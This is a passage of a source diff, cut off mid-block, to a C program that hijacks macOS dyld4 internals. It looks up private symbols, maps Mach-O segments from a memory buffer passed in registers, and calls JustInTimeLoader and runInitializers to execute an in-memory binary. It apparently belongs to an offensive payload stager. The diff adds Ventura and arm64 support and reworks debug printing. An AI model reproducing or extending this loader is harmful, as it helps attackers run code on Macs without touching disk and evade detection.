@@ -1,3 +1,4 @@
+
 /*
  * References:
  * @parchedmind
@@ -184,6 +185,19 @@ struct LoadOptions
     Missing     pathNotFoundHandler;// = nullptr;
 };
 
+struct InitialOptions
+{
+      bool inDyldCache;//        = false;
+      bool hasObjc;//            = false;
+      bool mayHavePlusLoad;//    = false;
+      bool roData;//             = false;
+      bool neverUnloaded;//      = false;
+      bool leaveMapped;//        = false;
+      bool roObjC;//             = false;
+      bool pre2022Binary;//      = false;
+ };
+
+
 struct Loaded {
   void* _allocator;//           = nullptr;
   void* * elements;//             = nullptr;
@@ -234,18 +248,25 @@ typedef NSModule (*NSLinkModule_ptr)(NSObjectFileImage objectFileImage, const ch
 typedef NSSymbol (*NSLookupSymbolInModule_ptr)(NSModule module, const char *symbolName);
 typedef void * (*NSAddressOfSymbol_ptr)(NSSymbol symbol);
 
-typedef /*Loader*/void * (*JustInTimeLoaderMake_ptr)(void *apis, void *ma, const char* path, const struct FileID * fileId, uint64_t sliceOffset, bool willNeverUnload, bool leaveMapped, bool overridesCache, uint16_t overridesDylibIndex);
+typedef /*Loader*/void * (*JustInTimeLoaderMake_ptr)(void *apis, void *ma, const char* path, const struct FileID * fileId, uint64_t sliceOffset, bool willNeverUnload, bool leaveMapped, bool overridesCache, uint16_t overridesDylibIndex, uint64_t layout);
+typedef /*Loader*/void * (*JustInTimeLoaderMake2_ptr)(void *apis, void *ma, const char* path, const struct FileID * fileId, uint64_t sliceOffset, bool willNeverUnload, bool leaveMapped, bool overridesCache, uint16_t overridesDylibIndex);
 typedef void * (*AnalyzeSegmentsLayout_ptr)(void *ma, uintptr_t * vmSpace, bool * hasZeroFill);
 typedef void * (*VMAllocate_ptr)(uint64_t target_task, void * address, uint64_t size, int flags);
 typedef void * (*VMDeallocate_ptr)(uint64_t target_task, void * address, uint64_t size);
 typedef void * (*WithRegions_ptr)(void *ma, void * callback);
+//typedef uint32_t (*DependentDylibCount_ptr)(void *ma, bool * alldepsarenormal);
+//typedef bool (*HasPlusLoad_ptr)(void *ma);
 typedef void * (*MMap_ptr)(void * sdg, void *addr, size_t length, int prot, int flags, int fd, uint64_t offset);
 void * memcpy2(void *dest, const void *src, size_t len);
 typedef void * (*Mprotect_ptr)(void * sdg, void * dst, uint64_t length, int prot);
 typedef void (*WithLoadersWriteLock_ptr)(void *apis, void * callback);
+//typedef void * (*LoaderLoader_ptr)(void * loader, const struct InitialOptions *, bool prebuilt, bool prebuiltApp, bool prebuiltIndex);
 typedef void (*LoadDependents_ptr)(void *topLoader, const struct diagnostics * diag, void * apis, const struct LoadOptions * lo);
+//typedef bool (*EnforceFormat_ptr)(void * ma, int malformed);
 typedef void (*RunInitializers_ptr)(void *topLoader, void * apis);
+typedef void * (*HandleFromLoader_ptr)(void *loader, bool firstOnly);
 typedef void (*IncDlRefCount_ptr)(void *apis, void * topLoader);
+//typedef void (*AddLoader_ptr)(void *apis, void * topLoader);
 typedef void (*NotifyLoad_ptr)(void * apis, struct ArrayOfLoaderPointers * newLoaders);
 typedef void (*NotifyDebuggerLoad_ptr)(void * apis, const struct ArrayOfLoaderPointers * aolp);
 typedef void (*ApplyFixups_ptr)(void * ldr, const struct diagnostics * diag, void * apis, struct DyldCacheDataConstLazyScopedWriter * dcd, bool b);
@@ -256,7 +277,6 @@ typedef bool (*HasThreadLocalVariables_ptr)(void * ma);
 typedef void (*SetUpTLVs_ptr)(void * ma, void * apis);
 typedef void (*AddWeakDefs_ptr)(void * apis, void * newLoaders);
 
-typedef uint64_t (*SimpleDPrintf_ptr)(uint64_t fd, const char * fmt, const void * a);
 
 uint64_t find_macho(uint64_t addr, unsigned int increment);
 uint64_t find_dylib(uint64_t addr, unsigned int increment);
@@ -269,7 +289,16 @@ uint64_t roundUp(uint64_t numToRound, uint64_t multiple);
 //#define DEBUG
 #ifdef DEBUG
 static void print(char * str);
-#define printf(a,b) print(a);
+#include "printf/printf.h"
+void _putchar(char character) {
+  char t[2];
+  t[0] = character;
+  t[1] = 0;
+  print(t);
+}
+#else
+#define print(a)
+#define printf(a,b)
 #endif
 
 
@@ -278,20 +307,23 @@ static void print(char * str);
 
 int main(int argc, char** argv)
 {
-#ifdef DEBUG
   print("main!\n");
-#endif
   uint64_t buffer = 0;
   uint64_t buffer_size = 0;
+#ifdef __aarch64__
+  __asm__(
+      "mov %0, x12\n"
+      "mov %1, x10\n"
+      : "=r"(buffer), "=r"(buffer_size));
+#else
   __asm__(
       "movq %%r10, %0;\n"
       "movq %%r12, %1;\n"
       : "=g"(buffer), "=g"(buffer_size));
-
-#ifdef DEBUG
-  print("hello world!\n");
 #endif
 
+  print("hello world!\n");
+
   int sierra = detect_sierra();
   uint64_t binary = DYLD_BASE_ADDR;
   uint64_t dyld;
@@ -341,9 +373,7 @@ int main(int argc, char** argv)
     }
     NSCreateObjectFileImageFromMemory_func = find_symbol(dyld, "_NSCreateObjectFileImageFromMemory", offset);
   }
-#ifdef DEBUG
   print("good symbol!\n");
-#endif
 
   // gDyld is a special struct that libdyld.dylib uses to interface with dyld4.
   // gDyld is not present in dyld3 and back.
@@ -351,142 +381,128 @@ int main(int argc, char** argv)
   //printf("gDyld: %lld\n", gDyld);
   void * addr_main = 0;
   if (gDyld != 0) {
-#ifdef DEBUG
     print("gDyld found, using dual hijack technique.\n");
-#endif
     // Also known as the RuntimeState or Allocator.
     void* apis = ((struct libdyldDyld4Section*)gDyld)->apis;
-#ifdef DEBUG
     printf("apis: %lld\n", apis);
-    printf("config: %i\n", (int)*(void **)(apis+8));
-#endif
+    printf("config: %lld\n", *(void **)(apis+8));
     // config is offset around 0x100000 from the start of dyld4.
     uint64_t base = roundUp((uint64_t)(*(void **)(apis+8) - 0x00100000), 0x1000);
-#ifdef DEBUG
     printf("base: %lld\n", base);
-#endif
     // sdyld will be the address of dyld4, which contains mangled symbols.
     uint64_t sdyld = find_macho(base, 0x1000);
-#ifdef DEBUG
+    uint64_t offset2 = sdyld;
     printf("sdyld: %lld\n", sdyld);
-#endif
-    JustInTimeLoaderMake_ptr JustInTimeLoaderMake_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld313MachOAnalyzerEPKcRKNS_6FileIDEybbbt", sdyld);
-    while (!JustInTimeLoaderMake_func) {
+    MMap_ptr MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", offset2);
+    while (!MMap_func) {
       sdyld = find_macho(sdyld + 0x1000, 0x1000);
       if (sdyld == 1) {
-#ifdef DEBUG
         print("failed.\n");
-#endif
         return 1;
       }
       //printf("Dyld: %lld\n", sdyld);
-      JustInTimeLoaderMake_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld313MachOAnalyzerEPKcRKNS_6FileIDEybbbt", sdyld);
+      MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", offset2);
     }
-    //printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-    //printf("JITLMP: %lld\n", JustInTimeLoaderMake_func);
-    SimpleDPrintf_ptr SimpleDPrintf_func = find_symbol(sdyld, "__simple_dprintf", sdyld);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "SimpleDPrintf_func: %lld\n", SimpleDPrintf_func);
-#endif
+    //printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+    JustInTimeLoaderMake_ptr JustInTimeLoaderMake_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld313MachOAnalyzerEPKcRKNS_6FileIDEybbbt", offset2);
+    JustInTimeLoaderMake2_ptr JustInTimeLoaderMake2_func = 0;
+    bool ventura = false;
+    if (!JustInTimeLoaderMake_func) {
+      offset2 = offset;
+      ventura = true;
+      MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", offset2);
+      JustInTimeLoaderMake2_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader4makeERNS_12RuntimeStateEPKN5dyld39MachOFileEPKcRKNS_6FileIDEybbbtPKN6mach_o6LayoutE", offset2);
+    }
+    if (ventura) {
+      print("Ventura!\n");
+    }
+    //printf("SimpleDPrintf_func: %lld\n", SimpleDPrintf_func);
+    printf("Errno: %lld\n", *(uint64_t*)find_symbol(sdyld, "_errno", offset2));
     // Loader::mapSegments
     uintptr_t vmSpace = 0;
     bool hasZeroFill;
-    AnalyzeSegmentsLayout_ptr AnalyzeSegmentsLayout_func = find_symbol(sdyld, "__ZNK5dyld313MachOAnalyzer21analyzeSegmentsLayoutERyRb", sdyld);
-#ifdef DEBUG
-    print("Analyzing Segments.\n");
-#endif
     *(uint32_t*)buffer = 0xfeedfacf;
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "Buffer: %lld\n", buffer);
-#endif
-    AnalyzeSegmentsLayout_func((void*)buffer, &vmSpace, &hasZeroFill);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "vmSpace: %lld\n", vmSpace);
-#endif
+    printf("Buffer: %lld\n", buffer);
+    if (ventura) {
+      // MachOFile =~= MachOAnalyzer
+      AnalyzeSegmentsLayout_ptr AnalyzeSegmentsLayout_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile21analyzeSegmentsLayoutERyRb", offset2);
+      print("Analyzing Segments.\n");
+      AnalyzeSegmentsLayout_func((void*)buffer, &vmSpace, &hasZeroFill);
+    } else {
+      AnalyzeSegmentsLayout_ptr AnalyzeSegmentsLayout_func = find_symbol(sdyld, "__ZNK5dyld313MachOAnalyzer21analyzeSegmentsLayoutERyRb", offset2);
+      print("Analyzing Segments.\n");
+      AnalyzeSegmentsLayout_func((void*)buffer, &vmSpace, &hasZeroFill);
+    };
+    printf("vmSpace: %lld\n", vmSpace);
     bool isTranslated = false; // Rosetta.
     uint64_t extraAllocSize = 0;
     if ((*(uint64_t **)(apis + 8))[0x7c] != 0) {
       isTranslated = true;
-#ifdef DEBUG
       print("Rosetta.\n");
-#endif
       // TODO: Rosseta requires a bit more space...
       extraAllocSize = 0x0;
     }
     vmSpace += extraAllocSize;
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "Translated: %s\n", isTranslated ? "true" : "false");
-#endif
+    printf("Translated: %s\n", isTranslated ? "true" : "false");
     uintptr_t loadAddress = 0;
-    VMAllocate_ptr VMAllocate_func = find_symbol(sdyld, "_vm_allocate", sdyld);
-    uint64_t mach_task_self = *(uint64_t*)find_symbol(sdyld, "_mach_task_self_", sdyld);
+    VMAllocate_ptr VMAllocate_func = find_symbol(sdyld, "_vm_allocate", offset2);
+    uint64_t mach_task_self = *(uint64_t*)find_symbol(sdyld, "_mach_task_self_", offset2);
     void * vmallocate_ret = VMAllocate_func(mach_task_self, &loadAddress, vmSpace, /*VM_FLAGS_ANYWHERE: */0x1);
-#ifdef DEBUG
-    SimpleDPrintf_func(1, "VMAllocate Ret: %lld\n", vmallocate_ret);
-    SimpleDPrintf_func(1, "LoadAddress: %lld\n", loadAddress);
-#endif
+    printf("VMAllocate Ret: %lld\n", vmallocate_ret);
+    printf("LoadAddress: %lld\n", loadAddress);
     // Put regions together...
     // JustInTimeLoader::withRegions via MachOAnalyzer::getAllSegmentsInfos
-    WithRegions_ptr WithRegions_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader11withRegionsEPKN5dyld313MachOAnalyzerEU13block_pointerFvRKNS1_5ArrayINS_6Loader6RegionEEEE", sdyld);
+    WithRegions_ptr WithRegions_func = 0;
+    if (ventura) {
+      WithRegions_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader11withRegionsEPKN5dyld39MachOFileEU13block_pointerFvRKNS1_5ArrayINS_6Loader6RegionEEEE", offset2);
+    } else {
+      WithRegions_func = find_symbol(sdyld, "__ZN5dyld416JustInTimeLoader11withRegionsEPKN5dyld313MachOAnalyzerEU13block_pointerFvRKNS1_5ArrayINS_6Loader6RegionEEEE", offset2);
+    };
     WithRegions_func((void*)buffer, ^(struct ArrayOfRegions * rptr) {
-#ifdef DEBUG
-        SimpleDPrintf_func(1, "Region Ptrs: %lld\n", rptr);
-        SimpleDPrintf_func(1, "usedCount: %lld\n", rptr->_usedCount);
-        SimpleDPrintf_func(1, "allocCount: %lld\n", rptr->_allocCount);
-#endif
+        printf("Region Ptrs: %lld\n", rptr);
+        printf("usedCount: %lld\n", rptr->_usedCount);
+        printf("allocCount: %lld\n", rptr->_allocCount);
         uint32_t segIndex = 0;
         uint64_t sliceOffset = 0;
         uint64_t lastOffset = 0;
         for (int i = 0 ; i < rptr->_usedCount; i++) {
           const struct Region region = rptr->_elements[i];
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Region vmOffset: %lld\n", region.vmOffset);
-          SimpleDPrintf_func(1, "Region perms: %lld\n", region.perms);
-          SimpleDPrintf_func(1, "Region isZeroFill: %lld\n", region.isZeroFill);
-          SimpleDPrintf_func(1, "Region readOnlyData: %lld\n", region.readOnlyData);
-          SimpleDPrintf_func(1, "Region fileOffset: %lld\n", region.fileOffset);
-          SimpleDPrintf_func(1, "Region fileSize: %lld\n", region.fileSize);
+          printf("Region vmOffset: %lld\n", region.vmOffset);
+          printf("Region perms: %lld\n", region.perms);
+          printf("Region isZeroFill: %lld\n", region.isZeroFill);
+          printf("Region readOnlyData: %lld\n", region.readOnlyData);
+          printf("Region fileOffset: %lld\n", region.fileOffset);
+          printf("Region fileSize: %lld\n", region.fileSize);
           print("----\n");
-#endif
           if ( region.isZeroFill || (region.fileSize == 0) )
             continue;
           if ( (region.vmOffset == 0) && (segIndex > 0) )
             continue;
           int perms = region.perms;
-          MMap_ptr MMap_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate4mmapEPvmiiim", sdyld);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-          SimpleDPrintf_func(1, "Addr: %lld\n", (void*)(loadAddress + region.vmOffset));
-          SimpleDPrintf_func(1, "Size: %lld\n", (size_t)region.fileSize);
-          SimpleDPrintf_func(1, "Perms: %lld\n", region.perms);
-          SimpleDPrintf_func(1, "Flags: %lld\n", MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS);
-          SimpleDPrintf_func(1, "FD: %lld\n", (int)-1);
-          SimpleDPrintf_func(1, "Offset: %lld\n", (size_t)(sliceOffset + region.fileOffset));
-#endif
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+          printf("Addr: %lld\n", (void*)(loadAddress + region.vmOffset));
+          printf("Size: %lld\n", (size_t)region.fileSize);
+          printf("Perms: %lld\n", region.perms);
+          printf("Flags: %lld\n", MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS);
+          printf("FD: %lld\n", (int)-1);
+          printf("Offset: %lld\n", (size_t)(sliceOffset + region.fileOffset));
           // MMap will init this with zeros.
           void* segAddress = MMap_func(*(void **)(apis+ 8), (void*)(loadAddress + region.vmOffset), (size_t)region.fileSize, PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
           lastOffset = loadAddress + region.vmOffset + region.fileSize;
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-          SimpleDPrintf_func(1, "Buffer: %lld\n", buffer);
-          SimpleDPrintf_func(1, "BufferO: %lld\n", buffer + sliceOffset + region.fileOffset);
-#endif
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+          printf("Buffer: %lld\n", buffer);
+          printf("BufferO: %lld\n", buffer + sliceOffset + region.fileOffset);
           memcpy2(segAddress, (const void *)(buffer + sliceOffset + region.fileOffset), (size_t)region.fileSize);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-#endif
-          Mprotect_ptr Mprotect_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate8mprotectEPvmi", sdyld);
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
+          Mprotect_ptr Mprotect_func = find_symbol(sdyld, "__ZNK5dyld415SyscallDelegate8mprotectEPvmi", offset2);
           Mprotect_func(*(void **)(apis+ 8), segAddress, (size_t)region.fileSize, perms);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "SegAddress: %lld\n", segAddress);
-          SimpleDPrintf_func(1, "Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", sdyld));
-#endif
+          printf("SegAddress: %lld\n", segAddress);
+          printf("Errno: %i\n", *(int*)find_symbol(sdyld, "_errno", offset2));
           ++segIndex;
         }
     });
     // Okay, we should be good to go with JustInTimeLoader::make.
     // __ZNK5dyld39MachOFile11installNameEv: ""
-    WithLoadersWriteLock_ptr WithLoadersWriteLock_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState20withLoadersWriteLockEU13block_pointerFvvE", sdyld);
     // We cannot use __block as it corrupts the stack, so we have to use a malloc technique to pass data.
     uintptr_t structspace = 0;
     uint64_t structspacesize = sizeof(void *)+ // rtopLoader
@@ -496,59 +512,46 @@ int main(int argc, char** argv)
         sizeof(struct LoadChain)+ // loadChain
         sizeof(struct LoadOptions)+ // depOptions
         sizeof(struct diagnostics); // diag
+    int initialoptionsoffset = structspacesize;
     VMAllocate_func(mach_task_self, &structspace, structspacesize, 0x1);
     uint64_t * rtopLoader = (uint64_t *)(structspace);;
-    WithLoadersWriteLock_func(apis, ^(){
+    if (ventura) {
       struct Loaded * loaded = (struct Loaded*)(apis+32);
       uintptr_t startLoaderCount = loaded->size;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "Loaded Size: %lld\n", loaded->size);
-      SimpleDPrintf_func(1, "Loaded first: %lld\n", (loaded->elements));
-      SimpleDPrintf_func(1, "Loaded Capacity: %lld\n", loaded->capacity);
-#endif
+      printf("Loaded Size: %lld\n", loaded->size);
+      printf("Loaded first: %lld\n", (loaded->elements));
+      printf("Loaded Capacity: %lld\n", loaded->capacity);
       struct FileID * fileid = (struct FileID *)(rtopLoader+sizeof(void *));// = { 0, 0, false };
       fileid->iNode = 0;
       fileid->modTime = 0;
       fileid->isValid = false;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "Apis: %lld\n", apis);
-      SimpleDPrintf_func(1, "LoadAddress: %lld\n", loadAddress);
-      SimpleDPrintf_func(1, "JITLMP: %lld\n", JustInTimeLoaderMake_func);
-#endif
-      void * topLoader = JustInTimeLoaderMake_func(apis, (void *)loadAddress, "", fileid, 0, false, true, false, 0);
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "TopLoader: %lld\n", topLoader);
-      SimpleDPrintf_func(1, "Toploader (*(int*)this): %i\n", *(int *)topLoader);
-      SimpleDPrintf_func(1, "Loaded Size: %lld\n", loaded->size);
-      SimpleDPrintf_func(1, "Loaded Capacity: %lld\n", loaded->capacity);
-#endif
+      printf("Apis: %lld\n", apis);
+      printf("LoadAddress: %lld\n", loadAddress);
+      printf("JITLMP: %lld\n", JustInTimeLoaderMake_func);
+      void * topLoader = JustInTimeLoaderMake2_func(apis, (void *)loadAddress, "A", fileid, 0, false, true, false, 0);
+      printf("TopLoader: %lld\n", topLoader);
+      printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
+      printf("Loaded Size: %lld\n", loaded->size);
+      printf("Loaded Capacity: %lld\n", loaded->capacity);
       struct PartialLoader * pl = (struct PartialLoader *)topLoader;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "LoadAddress: %lld\n", pl->mappedAddress);
-      SimpleDPrintf_func(1, "lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
-      SimpleDPrintf_func(1, "hidden: %lld\n", pl->hidden);
-      SimpleDPrintf_func(1, "Magic: %lld\n", pl->magic);
-      SimpleDPrintf_func(1, "IsPrebuilt: %lld\n", pl->isPrebuilt);
-#endif
+      printf("LoadAddress: %lld\n", pl->mappedAddress);
+      printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
+      printf("hidden: %lld\n", pl->hidden);
+      printf("Magic: %lld\n", pl->magic);
+      printf("IsPrebuilt: %lld\n", pl->isPrebuilt);
       pl->lateLeaveMapped = 1;
       pl = (struct PartialLoader *)topLoader;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
-#endif
+      printf("lateLeaveMapped: %lld\n", pl->lateLeaveMapped);
       struct LoadChain * loadChainMain = (struct LoadChain *)(fileid+sizeof(struct FileID));// = { 0, *(void **)(apis+24) };
       loadChainMain->previous = 0;
       loadChainMain->image = *(void **)(apis+24);
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "mainExecutableLoader: %lld\n", *(void **)(apis+24));
-      SimpleDPrintf_func(1, "mainExecutableLoader: %lld\n", loadChainMain->image);
-#endif
+      printf("mainExecutableLoader: %lld\n", *(void **)(apis+24));
+      printf("mainExecutableLoader: %lld\n", loadChainMain->image);
       struct LoadChain * loadChainCaller = (struct LoadChain *)(loadChainMain+sizeof(struct LoadChain));// = { &loadChainMain, &(loaded->elements[0]) };
       loadChainCaller->previous = &loadChainMain;
       loadChainCaller->image = &(loaded->elements[0]);
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "LoadedElements: %lld\n", &(loaded->elements[0]));
-      SimpleDPrintf_func(1, "Toploader (*(int*)this): %i\n", *(int *)topLoader);
-#endif
+      printf("LoadedElements: %lld\n", &(loaded->elements[0]));
+      printf("Toploader (*(int*)this): %i\n", *(int *)topLoader);
       struct LoadChain * loadChain = (struct LoadChain *)(loadChainCaller+sizeof(struct LoadChain));// = { &loadChainCaller, topLoader };
       loadChain->previous = &loadChainCaller;
       loadChain->image = topLoader;
@@ -559,102 +562,187 @@ int main(int argc, char** argv)
       depOptions->canBeDylib       = true;
       depOptions->rpathStack       = loadChain;
       depOptions->useFallBackPaths = true;
-      LoadDependents_ptr LoadDependents_func = find_symbol(sdyld, "__ZN5dyld46Loader14loadDependentsER11DiagnosticsRNS_12RuntimeStateERKNS0_11LoadOptionsE", sdyld);
+      LoadDependents_ptr LoadDependents_func = find_symbol(sdyld, "__ZN5dyld46Loader14loadDependentsER11DiagnosticsRNS_12RuntimeStateERKNS0_11LoadOptionsE", offset2);
       struct diagnostics * diag = (struct diagnostics *)(depOptions+sizeof(struct LoadOptions));
       diag->_buffer = 0;
       LoadDependents_func(topLoader, diag, apis, depOptions);
       if (diag->_buffer != 0) {
-#ifdef DEBUG
         print("Error\n");
-#endif
       };
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "buffer: %lld\n", diag->_buffer);
-      SimpleDPrintf_func(1, "startLoaderCount: %lld\n", startLoaderCount);
-#endif
+      printf("buffer: %lld\n", diag->_buffer);
+      printf("startLoaderCount: %lld\n", startLoaderCount);
       uint64_t newLoadersCount = loaded->size - startLoaderCount;
-#ifdef DEBUG
-      SimpleDPrintf_func(1, "newLoadersCount: %lld\n", newLoadersCount);
-#endif
+      printf("newLoadersCount: %lld\n", newLoadersCount);
       void * * newLoaders = &loaded->elements[startLoaderCount];
       struct ArrayOfLoaderPointers newLoadersArray = { newLoaders, newLoadersCount, newLoadersCount };
       if (newLoadersCount != 0) {
-        NotifyDebuggerLoad_ptr NotifyDebuggerLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState18notifyDebuggerLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+        NotifyDebuggerLoad_ptr NotifyDebuggerLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState18notifyDebuggerLoadERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
         NotifyDebuggerLoad_func(apis, &newLoadersArray);
         if (*(char *)(apis + 0x7f) != '\0') {
-          AddWeakDefs_ptr AddWeakDefs_func = find_symbol(sdyld, "__ZN5dyld46Loader16addWeakDefsToMapERNS_12RuntimeStateERKN5dyld35ArrayIPKS0_EE", sdyld);
+          AddWeakDefs_ptr AddWeakDefs_func = find_symbol(sdyld, "__ZN5dyld46Loader16addWeakDefsToMapERNS_12RuntimeStateERKNSt3__14spanIPKS0_Lm18446744073709551615EEE", offset2);
           AddWeakDefs_func(apis, &newLoadersArray);
-#ifdef DEBUG
           print("WeakRefed\n");
-#endif
         }
-        ApplyFixups_ptr ApplyFixups_func = find_symbol(sdyld, "__ZNK5dyld46Loader11applyFixupsER11DiagnosticsRNS_12RuntimeStateERNS_34DyldCacheDataConstLazyScopedWriterEb", sdyld);
+        ApplyFixups_ptr ApplyFixups_func = find_symbol(sdyld, "__ZNK5dyld46Loader11applyFixupsER11DiagnosticsRNS_12RuntimeStateERNS_34DyldCacheDataConstLazyScopedWriterEb", offset2);
         struct DyldCacheDataConstLazyScopedWriter dcdclsw = { apis, false };
         for (int i = 0; i != newLoadersCount; ++i) {
-#ifdef DEBUG
           print("Fixing Up!\n");
-#endif
           void * ldr = newLoaders[i];
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Ldr: %lld\n", ldr);
-#endif
+          printf("Ldr: %lld\n", ldr);
           ApplyFixups_func(ldr, diag, apis, &dcdclsw, true);
-#ifdef DEBUG
-          SimpleDPrintf_func(1, "Diag: %lld\n", diag->_buffer);
-#endif
+          printf("Diag: %lld\n", diag->_buffer);
         }
         // TODO: Figure out if we need addPermanentRanges.
-        NotifyDtrace_ptr NotifyDtrace_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState12notifyDtraceERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+        NotifyDtrace_ptr NotifyDtrace_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState12notifyDtraceERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
         NotifyDtrace_func(apis, &newLoadersArray);
-        RebindMissingFlatLazySymbols_ptr RebindMissingFlatLazySymbols_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState28rebindMissingFlatLazySymbolsERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+        RebindMissingFlatLazySymbols_ptr RebindMissingFlatLazySymbols_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState28rebindMissingFlatLazySymbolsERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
         RebindMissingFlatLazySymbols_func(apis, &newLoadersArray);
         for (int i = 0; i != newLoadersCount; ++i) {
           void * ldr = newLoaders[i];
-#ifdef DEBUG
           print("Setting up locals.\n");
-#endif
-          GetMA_ptr GetMA_func = find_symbol(sdyld, "__ZNK5dyld46Loader11loadAddressERNS_12RuntimeStateE", sdyld);
+          GetMA_ptr GetMA_func = find_symbol(sdyld, "__ZNK5dyld46Loader11loadAddressERNS_12RuntimeStateE", offset2);
           const void* * ma = GetMA_func(ldr, apis);
-          HasThreadLocalVariables_ptr HasThreadLocalVariables_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile23hasThreadLocalVariablesEv", sdyld);
+          HasThreadLocalVariables_ptr HasThreadLocalVariables_func = find_symbol(sdyld, "__ZNK5dyld39MachOFile23hasThreadLocalVariablesEv", offset2);
           if (HasThreadLocalVariables_func(ma) == true) {
-#ifdef DEBUG
             print("Has local variables.\n");
-#endif
-            SetUpTLVs_ptr SetUpTLVs_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState9setUpTLVsEPKN5dyld313MachOAnalyzerE", sdyld);
+            SetUpTLVs_ptr SetUpTLVs_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState9setUpTLVsEPKN5dyld313MachOAnalyzerE", offset2);
             SetUpTLVs_func(apis, ma);
           }
         };
       }
-      IncDlRefCount_ptr IncDlRefCount_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState13incDlRefCountEPKNS_6LoaderE", sdyld);
+      IncDlRefCount_ptr IncDlRefCount_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState13incDlRefCountEPKNS_6LoaderE", offset2);
       IncDlRefCount_func(apis, topLoader);
-#ifdef DEBUG
       print("Notifying.\n");
-#endif
-      NotifyLoad_ptr NotifyLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState10notifyLoadERKN5dyld35ArrayIPKNS_6LoaderEEE", sdyld);
+      NotifyLoad_ptr NotifyLoad_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState10notifyLoadERKNSt3__14spanIPKNS_6LoaderELm18446744073709551615EEE", offset2);
       NotifyLoad_func(apis, &newLoadersArray);
-#ifdef DEBUG
       print("Initializing\n");
-#endif
-      RunInitializers_ptr RunInitializers_func = find_symbol(sdyld, "__ZNK5dyld46Loader38runInitializersBottomUpPlusUpwardLinksERNS_12RuntimeStateE", sdyld);
+      RunInitializers_ptr RunInitializers_func = find_symbol(sdyld, "__ZNK5dyld46Loader38runInitializersBottomUpPlusUpwardLinksERNS_12RuntimeStateE", offset2);
       RunInitializers_func(topLoader, apis);
       *rtopLoader = (uint64_t)topLoader;
-    });
+    } else {
+      WithLoadersWriteLock_ptr WithLoadersWriteLock_func = find_symbol(sdyld, "__ZN5dyld412RuntimeState20withLoadersWriteLockEU13block_pointerFvvE", offset2);
+      WithLoadersWriteLock_func(apis, ^(){
+        struct Loaded * loaded = (struct Loaded*)(apis+32);
+        uintptr_t startLoaderCount = loaded->size;
+        printf("Loaded Size: %lld\n", loaded->size);
+        printf("Loaded first: %lld\n", (loaded->elements));
+        printf("Loaded Capacity: %lld\n", loaded->capacity);
+        struct FileID * fileid = (struct FileID *)(rtopLoader+sizeof(void *));// = { 0, 0, false };
+        fileid->iNode = 0;
+        fileid->modTime = 0;
+        fileid->isValid = false;
+        printf("Apis: %lld\n", apis);
+        printf("LoadAddress: %lld\n", loadAddress);
